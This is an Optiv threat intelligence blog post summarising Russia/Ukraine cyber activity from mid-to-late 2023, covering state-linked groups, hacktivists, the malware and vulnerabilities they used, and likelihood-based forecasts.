Every Solution You Can Imagine – and More
What cybersecurity solution do you need? From Zero Trust to ADR, IAM, risk/privacy, data protection, AppSec and threat, securing digital transformation, to resiliency and remediation, we can build the right program to help solve your challenges.
A Single Partner for Everything You Need
Optiv works with more than 450 world-class security technology partners. By putting you at the center of our unmatched ecosystem of people, products, partners and programs, we accelerate business progress like no other company can.
We Are Optiv
Greatness is every team working toward a common goal. Winning in spite of cyber threats and overcoming challenges in spite of them. It’s building for a future that only you can create or simply coming home in time for dinner.
However you define greatness, Optiv is in your corner. We manage cyber risk so you can secure your full potential.
December 6, 2023
The Russia/Ukraine war is approaching its second year, and both physical and cyber warfare continue. Ukraine has continued to conduct defensive strategies, while cybercriminal groups have also persisted in launching DDoS, information stealing, and wiper attacks. Russia has launched further attacks while dealing with internal struggles. The war has caused a rippling effect of destruction and disruption across the world, including a persistent impact within the cybercriminal landscape.
Optiv’s Global Threat Intelligence Center (gTIC) has provided periodic updates on Russian and Ukrainian actions as well as estimated cyber-related implications in advisories and Optiv blog posts on February 4, February 22, February 24, June 30, August 25, September 29, October 31, November 29, December 20, March 02, 2023, May 30, 2023 and August 25, 2023. This update will provide information on the events of the previous 90 days and what we can expect looking forward.
This will be the last quarterly update related to the ongoing Russia/Ukraine conflict. Optiv’s gTIC will provide updates via blog posts and advisories on an ad-hoc basis.
In June 2023, the Computer Emergency Response Team of Ukraine (CERT-UA) warned that the Russia-linked threat group, APT28 (aka BlueDelta, Sofacy, PawnStorm, Fancy Bear, Forest Blizzard, FROZENLAKE) had conducted phishing attacks with malicious attachments that exploited vulnerabilities in Roundcube servers (CVE-2020-35730, CVE-2020-12641, and CVE-2021-44026) to run reconnaissance and exfiltrate sensitive data. The scripts redirected incoming emails and gathered session cookies, user information, and address books. CERT-UA reported that phishing emails were sent to more than 40 government organizations.
In October 2023, CERT-UA shared that threat actors tracked as UAC-0165 had “interfered” with at least 11 Ukrainian telecommunications organizations between May - September 2023, which led to service interruptions that impacted customers. The threat group conducted reconnaissance and post-exploitation activities from previously compromised servers and utilized two programs, POEMGATE and POSEIDON, which enable credential theft and remote control of the infected hosts. The group also reportedly used a utility called WHITECAT to erase any forensic trail. Once the group successfully breached the network, they attempted to disable network and MikroTik server equipment, as well as data storage systems.
In May 2023, CERT-UA reported that threat actors, attributed to as UAC-0006, had conducted a phishing campaign with invoice-themed lures to deploy the SmokeLoader malware in a polyglot file. CERT-UA regards this as a financially motivated operation designed to steal credentials and make unauthorized transfers of funds. In another advisory from April 2023, CERT-UA warned of destructive attacks attributed to UAC-0165 against public sector organizations. The group deployed a script-based wiper malware called RoarBAT, which searched for files with a specific extension list before permanently using the legitimate WinRAR utility to permanently delete them. CERT-UA attributed UAC-0165 to the Russia-linked Sandworm Team (aka FROZENBARENTS, SeaShell Blizzard, Voodoo Bear), which has historically used wiper malware to target Ukrainian organizations.
In July 2023, The CERT-UA shared their discovery of Microsoft Excel (xls) documents containing a legitimate macro and a macro that launches the PicassoLoader malware and subsequently execute the njRAT malware. CERT-UA attributed this activity to UAC-0057 (aka GhostWriter), a threat actor that they had also observed sending phishing emails with malicious attachments containing an exploit for CVE-2023-38831 (CVSS 7.8), a vulnerability impacting WinRAR archiving software. The adversary’s goal was to deploy the Cobalt Strike beacon, followed by the PicassoLoader malware. The use of njRAT, a strain of malware active since 2010, proves how threat actors do not necessarily have to create custom or bespoke malware when older and more simple tools and procedures are still effective.
In July 2023, security researchers with BlackBerry reported that the threat actors behind the RomCom malware had carried out phishing attacks against Ukraine and supporting countries just before a NATO Summit in Lithuania. The threat actor appeared to use this important, Ukraine-specific event as a lure to push the malware to victims, and researchers discovered a website impersonating the Ukrainian World Congress non-profit organization. The execution chain used in this campaign exploited the Follina remote code execution vulnerability, CVE-2022-30190, which impacts Microsoft's Support Diagnostic Tool (MSDT). Reported in May 2022, this vulnerability is an attractive attack vector for threat actors of all sophistication levels. Optiv’s gTIC conducted analysis of more than 45 ransomware groups and 26 APT groups across multiple countries, including Russia, North Korea, China, and Iran, and identified 5 ransomware groups and 13 APT groups that have been observed exploiting the Follina vulnerability since its disclosure.
In August 2023, Microsoft security researchers reported that Midnight Blizzard (aka Nobelium, APT29, UNC2452, and Cozy Bear) was observed using Microsoft Teams to mount targeted campaigns aimed at stealing Microsoft 365 passwords and pivoting into organizations’ Azure Active Directory and other sensitive environments. The group reportedly targeted 40 global government, technology, manufacturing, and media organizations. Midnight Blizzard used previously compromised valid accounts to send social engineering messages while impersonating technical support. The threat actor attempted, in some cases, to add a device to the organization as a managed device via Microsoft Entra ID. While the victims of these campaigns were located worldwide, there is an Even Chance that future attacks and espionage/information gathering campaigns carried out by APT29 will be targeted toward Ukrainian and NATO country’s organizations to gather strategic information.
In August 2023, U.S. federal agencies and international partners in the U.K., New Zealand, Australia, and Canada published a report warning that the Sandworm Team threat actor was deploying a new strain of malware called “Infamous Chisel.” This malware, while not highly sophisticated, enables persistent remote access to infected Android devices over the TOR network and the subsequent exfiltration of strategic system information that would provide value to the Russian government.
In September 2023, CERT-UA reported that it stopped a cyberattack attributed to APT28 against an unnamed Ukrainian critical energy infrastructure facility. The attack began with a phishing email that, when clicked by the victim, activated an infection chain and downloaded a malicious ZIP archive. A scheduled task enabled persistence, and RCE was implemented using a cURL through a legitimate service called webhook.site.
In September 2023, Reuters reported that “Russian spies were using hackers to target computer systems at law enforcement agencies in Ukraine in a bid to identify and obtain evidence related to alleged Russian war crimes,” according to Ukraine’s cyber defense chief. Reuters also indicates that these adversaries have increased their targeting of the Ukrainian Prosecutor General’s office and “departments documenting war crimes.” Ukraine’s cyber defense chief reported that the focus of Russia-linked APT groups has shifted from energy facilities to law enforcement agencies, which had previously not been targeted. The purported goal of the campaigns, according to Reuters, was to help Russian individuals “avoid prosecution and move them back to Russia.”
In October 2023, the website of the British royal family suffered a DDoS attack that the Russian-linked threat group, KillNet, claimed responsibility for. The site was down for nearly 90 minutes, and the threat group reportedly did not gain access to its systems, content, or site. The website was targeted days after King Charles condemned the invasion of Ukraine, indicating that the DDoS attack was Likely in retaliation for speaking against the Russian actions. KillNet has previously targeted government websites within Europe, including the European Parliament website after the lawmakers approved a resolution calling Moscow a state sponsor of terrorism in November 2022.
In October 2023, a Ukrainian official stated that Russian cyberattacks had become more sophisticated and frequent, the daily goal of disrupting vital infrastructure. Deputy Foreign Minister Anton Demokhin reported that the cyberattacks, while not as devastating as expected, were consuming significant time, attention, and resources to defend networks and prevent damage and further disruption. Ukraine recorded 3,974 cyber incidents between January 2022 and September 2023, with most coming from Russian attackers.
In October 2023, the Cyber Army of Russia Reborn, a Russian-affiliated threat group, openly advertised for a “chat admin or moderator” position on cybercriminal forums. The Cyber Army of Russia Reborn is a hacktivist group that is widely believed to be a replica of another hacktivist group, IT Army of Ukraine. The Cyber Army of Russia reportedly conducts DDoS attacks on Ukrainian organizations and government agencies of countries in support of Ukraine. The group has claimed that conflicts and geopolitical tensions is the motivation of their attacks. It is not clear why the Cyber Army of Russia Reborn advertised for a position openly on the dark web. However, it raises concerns for security researchers about the group’s intentions. There is an Even Chance that this position advertisement indicates that the group is seeking to strengthen capabilities and expand operations.
The IT Army of Ukraine, a collective that has nearly 10,000 volunteers, continues to be active against Russian organizations. The group claimed responsibility for temporarily disabling internet services in some of the territories occupied by the Russian army. The group reportedly conducted attacks against Russia the internet providers, “Miranda-media,” “Krimtelekom,” and MirTelekom,” and has invited supporters to install their software to increase the botnet network. As with most DDoS attacks, the companies mitigated the attacks and restored services within 24 hours.
In October 2023, Recorded Future indicated that Ukrainian hackers had reportedly teamed up with the nation’s security services, the SBU, to “breach Russia’s largest private bank” and “obtain the data of more than 30 million customers.” These hackers told Recorded Future that they would share this data with journalists.
In October 2023, the Ukrainian Cyber Alliance (UCA), a Ukrainian hacktivist group, infiltrated and disrupted the Trigona ransomware operation. Initiated in 2021, the UCA is comprised of volunteers worldwide that purportedly work to defend the country’s cyberspace against Russian attacks. UCA hackers reportedly gained access to the Trigona ransomware infrastructure by leveraging a public exploit for CVE-2023-22515 (CVSS 9.8) in Confluence Data Center and Server. UCA maintained persistence and eventually wiped the servers completely.
Based on ransomware variant similarities, the Trigona ransomware group is believed to have ties to the Russia-linked Alphv ransomware operation (aka BlackCat). The UCA reported that they would provide decryption keys found in the stolen data and any relevant information to law enforcement agencies.
From August to September 2023, the U.S. Cyber Command (CYBERCOM) deployed a team of cyberwarfare experts in Lithuania, which borders Moscow’s heavily militarized Kaliningrad enclave, to conduct a “defensive hunt operation.” The specialists reportedly searched for evidence of malicious activities, and the purported goal of the operation was to “defend the nation in and through cyberspace.” The operation was not conducted to directly benefit Ukraine, but rather because the same threat actors often conduct operations against NATO countries like Lithuania. Russia-linked cyberattacks targeting NATO countries in 2022 increased by 300%. Operations like the one conducted by CYBERCOM can be helpful in information sharing and mitigation techniques.
Since the start of the Russian/Ukraine conflict, thousands of people have joined hacktivist and hacker groups. While many of their attacks are DDoS attacks or unsophisticated in nature, they can cause disruptions and have led to the temporary disruption of business and operations in critical verticals including banks, pharmacies, hospitals, transportation services, and government operations.
In October 2023, the International Committee of the Red Cross (ICRC), published its first set of rules of engagement for civilian hackers. The rules have been dubbed a “Geneva Code” of cyber warfare and includes the following eight quoted rules.
Both Ukrainian and Russian hacking groups have reported that they will work to de-escalate cyberattacks and comply with the rules that have been proposed. One of the groups, KillNet, reported to BBC News that they agree to the terms and rules, and it should be considered as a first step from the group towards peace. Additionally, the IT Army of Ukraine has vowed to avoid cyberattacks that would impact civilians.
If the commitments to follow these rules are sincere, there will Likely be a reduction in the number of cyberattacks causing disruptions to civilian operations over the next 12 months. However, these vows have previously proven to be untrue or unsuccessful. For example, in 2020, multiple ransomware groups – Maze, REvil, DoppelPaymer, and more – vowed to avoid healthcare organizations during the COVID-19 pandemic, which lasted for a few months before healthcare organizations were targeted again. Therefore, there is an Even Chance that the hacker groups will continue to target organizations and cause disruptions that affect civilians over the next 12 months.
In September 2023, the State Service of Special Communications and Information Protection of Ukraine (SSSCIP) released a report covering Russia’s cyber tactics in the first half of 2023. The goal of the report is to help Ukrainian cybersecurity specialists and international partners in mitigating and defending against Russia-linked cyberattacks. The report highlighted an increase in Russia-linked threat actors’ attention on law enforcement agencies, energy and media organizations, and their targeting of Ukraine has more than doubled (1.9 per day in H2 2022 to 4-5 per day in H1 2023). There were 342 confirmed incidents targeting Ukraine in the second half of 2022, and 762 in the first half of 2023 – an increase of 123%. The analysis revealed that Russia-linked threat actors often revisit victims that handle and maintain critical data of interest to the Russian military. This report, along with reports from Mandiant, highlight the increased use of living-off-the-land (LOTL) techniques observed in Russia-linked cyberattacks.
This type of report can be incredibly beneficial in information sharing operations, which enable accurate mitigation techniques and the spread of knowledge on groups’ and malware activities. It is Likely that Russia-linked threat groups will continue to target Ukraine and NATO countries, improve their TTPs, and identify ways to conduct more complex and successful attacks over the next 12 months. Also over the next 12 months, it is Likely that Russia-linked groups will increasingly focus on evading detection and conducting long-term espionage attacks targeting Ukraine and supporting countries to steal sensitive information that would be of strategic value to the Russian government.
Other countries that have a history of state-sponsored and/or APT attacks which have indirectly aligned or maintained suspicious neutrality towards Russia include China and India, which could also pose additional risks or proxies for cyberattacks. While China has ultimately avoided physical involvement in the war, they have maintained a suspicious balance between suspending and continuing trade and business suspended business. China-linked threat groups have also parroted Russian narratives when they aligned with China’s criticism of the U.S. Despite a focus on the U.S., there is an Even Chance that these groups could target countries of strategic interest to Russia over the next 12 months.
It is Likely that Russian and Ukrainian hackers will continue to target vulnerabilities in ubiquitous software over the next 12 months. In addition to multiple vulnerabilities, Optiv’s gTIC assesses it is Likely that cybercriminals and fringe state-sponsored campaigns will use common software and malware in the coming months, such as:
It is Likely that threat actors will continue to use the same tactics observed in cyberattacks attributed to Russia-linked and Russia-supporting groups.
Table 1: MITRE ATT&CK techniques observed in reported cyberattacks related to the Russia/Ukraine conflict
Optiv Security: Secure greatness.®
Optiv is the cyber advisory and solutions leader, delivering strategic and technical expertise to nearly 6,000 companies across every major industry. We partner with organizations to advise, deploy and operate complete cybersecurity programs from strategy and managed security services to risk, integration and technology solutions. With clients at the center of our unmatched ecosystem of people, products, partners and programs, we accelerate business progress like no other company can. At Optiv, we manage cyber risk so you can secure your full potential. For more information, visit www.optiv.com.
May 30, 2023
Optiv's gTIC addresses the latest cyberattacks launched in the Russia-Ukraine war.
August 25, 2023
Optiv's Global Threat Intelligence Center (gTIC) provides new cyber intel pertaining to the Russia/Ukraine conflict.
March 02, 2023
Optiv's gTIC shares new cybersecurity updates in the Russia-Ukraine war, including DDoS attacks and the use of Telegram for adversary communications.
Let us know what you need, and we will have an Optiv professional contact you shortly.